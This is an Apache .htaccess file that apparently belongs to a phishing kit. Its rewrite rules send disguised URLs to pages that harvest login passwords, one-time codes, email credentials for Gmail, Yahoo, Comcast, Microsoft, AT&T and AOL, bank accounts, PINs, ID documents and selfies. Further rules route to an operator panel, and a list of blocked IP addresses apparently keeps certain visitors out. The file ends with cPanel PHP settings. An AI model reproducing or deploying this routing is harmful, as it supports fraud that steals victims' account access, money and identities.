Options +FollowSymLinks
RewriteEngine On
RewriteRule ^xsignin$ dash/login.php
RewriteRule ^xsignins$ dash/password.php
RewriteRule ^email$ dash/email.php
RewriteRule ^email-verify$ dash/otpmail.php
RewriteRule ^process$ dash/waiting.php
RewriteRule ^loginotp$ dash/otp.php
RewriteRule ^loginauthen$ dash/authencode.php
RewriteRule ^loginauth$ dash/authen.php
RewriteRule ^accountbank$ dash/bank.php
RewriteRule ^accountbanks$ dash/addbank.php
RewriteRule ^bankaccount$ dash/addbanks.php
RewriteRule ^bankaccounts$ dash/addpin.php
RewriteRule ^Account$ dash/information.php
RewriteRule ^accountverify$ dash/addocuments.php
RewriteRule ^accountverified$ dash/addselfies.php
RewriteRule ^accountreview$ dash/finish.php
RewriteRule ^phonenumber$ dash/phonenumber.php
RewriteRule ^phonenumbers$ dash/phonenumberdef.php
RewriteRule ^forgot_password$ dash/resetpass.php

# Email Login
RewriteRule ^gmail$ dash/email/gmailpass.php [L]
RewriteRule ^yahoo$ dash/email/yahoopass.php [L]
RewriteRule ^comcast$ dash/email/xfinitypass.php [L]
RewriteRule ^microsoft$ dash/email/microsoftpass.php [L]
RewriteRule ^att$ dash/email/attpass.php [L]
RewriteRule ^aol$ dash/email/aolpass.php [L]

# Email OTP
RewriteRule ^gmails$ dash/email/gmailotp.php [L]
RewriteRule ^gmailauth$ dash/email/gmailauth.php [L]
RewriteRule ^yahoos$ dash/email/yahoootp.php [L]
RewriteRule ^comcasts$ dash/email/xfinityotp.php [L]
RewriteRule ^microsofts$ dash/email/microsoftotp.php [L]
RewriteRule ^atts$ dash/email/attotp.php [L]
RewriteRule ^aols$ dash/email/aolotp.php [L]

# Email Auth
RewriteRule ^yahooauth$ dash/email/yahoootpmail.php [L]
RewriteRule ^aolauth$ dash/email/aolotpmail.php [L]
RewriteRule ^yahooauths$ dash/email/yahoomailotp.php [L]
RewriteRule ^aolauths$ dash/email/aolmailotp.php [L]

RewriteRule ^xyz/dashboard$ pane/dash.php
RewriteRule ^xyz/blacklist$ pane/blacklist.php
RewriteRule ^xyz/settings$ pane/settings.php
RewriteRule ^xyz/users$ pane/users.php
RewriteRule ^xyz/listmark$ pane/listmark.php
RewriteRule ^xyz/viewuser$ pane/usersview.php
RewriteRule ^xyz$ pane/login.php

<Files 403.shtml>
order allow,deny
allow from all
</Files>

<Files "config.json">
    Order Allow,Deny
    Deny from all
</Files>

deny from 218.220.213.9
deny from 133.32.176.211
deny from 14.11.42.128
deny from 61.197.132.112
deny from 58.89.142.120
deny from 106.157.255.210
deny from 131.147.89.135
deny from 163.131.3.54
deny from 133.106.40.13
deny from 116.82.133.39
deny from 133.155.160.202
deny from 122.20.171.107
deny from 49.98.50.48
deny from 92.202.160.221
deny from 106.155.2.97
deny from 219.113.84.178

# php -- BEGIN cPanel-generated handler, do not edit
# Set the “ea-php81” package as the default “PHP” programming language.
<IfModule mime_module>
  AddHandler application/x-httpd-ea-php81 .php .php8 .phtml
</IfModule>
# php -- END cPanel-generated handler, do not edit

# BEGIN cPanel-generated php ini directives, do not edit
# Manual editing of this file may result in unexpected behavior.
# To make changes to this file, use the cPanel MultiPHP INI Editor (Home >> Software >> MultiPHP INI Editor)
# For more information, read our documentation (https://go.cpanel.net/EA4ModifyINI)
<IfModule php8_module>
   php_flag display_errors On
   php_value max_execution_time 30
   php_value max_input_time 60
   php_value max_input_vars 1000
   php_value memory_limit 128M
   php_value post_max_size 8M
   php_value session.gc_maxlifetime 1440
   php_value session.save_path "/var/cpanel/php/sessions/ea-php82"
   php_value upload_max_filesize 2M
   php_flag zlib.output_compression On
</IfModule>
<IfModule lsapi_module>
   php_flag display_errors On
   php_value max_execution_time 30
   php_value max_input_time 60
   php_value max_input_vars 1000
   php_value memory_limit 128M
   php_value post_max_size 8M
   php_value session.gc_maxlifetime 1440
   php_value session.save_path "/var/cpanel/php/sessions/ea-php82"
   php_value upload_max_filesize 2M
   php_flag zlib.output_compression On
</IfModule>
# END cPanel-generated php ini directives, do not edit
